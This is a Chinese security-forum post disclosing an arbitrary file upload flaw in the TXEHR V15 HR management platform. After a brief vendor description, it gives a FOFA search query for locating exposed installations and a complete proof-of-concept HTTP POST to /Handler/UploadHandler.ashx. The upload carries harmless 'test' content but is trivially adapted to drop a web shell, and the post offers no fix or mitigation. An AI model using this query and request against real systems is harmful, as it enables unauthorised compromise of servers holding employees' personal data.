同享TXEHR V15人力管理管理平台存在任意文件上传漏洞-网络安全论坛-网络安全-阻击者联盟

同享TXEHR V15人力管理管理平台存在任意文件上传漏洞

同享软件成立于1997年,运营中心位于东莞南城南新产业国际。专注研发和推广人力资源信息化产品,帮助企业构建统一的人力资源数智化平台,快速提高企业人才管理能力,提升人力资源管理效率,帮助员工快速成长,协助企业实现智慧决策。同享TXEHR V15人力管理管理平台UploadHandler存在任意文件上传漏洞。

Fofa搜索语句:body=”/Assistant/Default.aspx”

1722639114091

漏洞复现:

POST /Handler/UploadHandler.ashx?folder=Uploadfile2 HTTP/1.1
Host: 
accept: */*
Content-Type: multipart/form-data; boundary=---------------------------123
Content-Length: 177
Te: trailers
Connection: close

-----------------------------123
Content-Disposition: form-data; name="Filedata"; filename="123.jpg"; Content-Type: text/plain

test
-----------------------------123--

 

f528c33a30868d4d78bfb1ce5c4c6b67

 

请登录后发表评论